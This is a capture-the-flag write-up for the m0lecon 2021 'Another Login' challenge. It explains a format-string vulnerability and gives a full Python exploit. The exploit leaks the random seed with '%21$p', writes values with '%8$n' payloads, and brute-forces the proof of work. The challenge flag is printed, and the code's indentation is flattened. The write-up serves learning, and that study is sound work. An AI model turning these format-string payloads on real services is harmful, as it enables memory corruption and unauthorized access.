Tags: srand unintended-solution seed 

Rating:

[Link to original writeup](https://wrecktheline.com/writeups/m0lecon-2021/#login1_writeup)

# Another Login (29 solves, 160 points)
by FeDEX

```
Just another simple login bypass challenge.

nc challs.m0lecon.it 1907

Author: Alberto247
```

We are presented a binary and a remote end:
```
$ file chall
chall: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7d6890a38b10cab434c876854ab80f742d3abf77, for GNU/Linux 3.2.0, not stripped
```

Reversing the binary is pretty straight forward. The binary reads 4 random bytes from `/dev/urandom` and uses them to initiate `srandom()`.
After that, the binary proceeds to generate 15 times one pair of number: `public | private`.
We are asked to provide the sum of the pair.

However, due to the fact that the program has unsanitized output formating, we can leak the seed from the stack using this vulnerability and then precalculate all pairs of numbers:

```python
if __name__ == "__main__":

from hashlib import sha256
from binascii import unhexlify
import re
from itertools import product

while 1:

######################################## POW

p = remote(remote_server, PORT)

ret = p.recvline().strip().decode()
prefix, suffix = re.findall(r"Give me a string starting with (.+) such that its sha256sum ends in (.+).", ret)[0]

for i_list in product(list(range(32, 128)), repeat=5):
c_list = list(map(chr, i_list))
tmp = prefix + "".join(c_list)
tmp_hash = sha256(tmp.encode()).hexdigest()
if tmp_hash[-5:] == suffix:
print "found!"
p.sendline(tmp)
break
else:
print "not found..."

######################################## EXPLOIOT

p.recvline()

p.recvuntil('Give me the 1 secret, summed to')
looking = p.recvline().strip().replace('!','')
print 'Value now is >>',looking,'<<'

payload = '%21$p' # leak seed from stack
payload += '%172c' #
payload += '%8$n' # put value 190 at int_input

p.sendline(payload)

data = p.recvline()
data = p.recvline()
print 'SEED=', data[2:10]

seed = int('0x'+data[2:10],16)

libc_native.srand(seed)
caca = libc_native.rand() % 255
print 'GENERATED I got',libc_native.rand() % 8 + 2,caca

if 'NOPE' in p.recvline():
p.close()
continue
else:
print 'MATCH!!!'
# gdb.attach(p)

for i in range(15):
val1 = libc_native.rand() % 256
val2 = libc_native.rand() % 8 + 2
p.sendline('%'+str(val1+val2)+'c' + '%8$n')

# ============ GDB =========== #

p.interactive()
```

- flag: `ptm{D1d_u_r3ad_th3_0per4t0r_m4nua1_b3f0re_l0gging_1n?}`

Original writeup (https://wrecktheline.com/writeups/m0lecon-2021/#login1_writeup).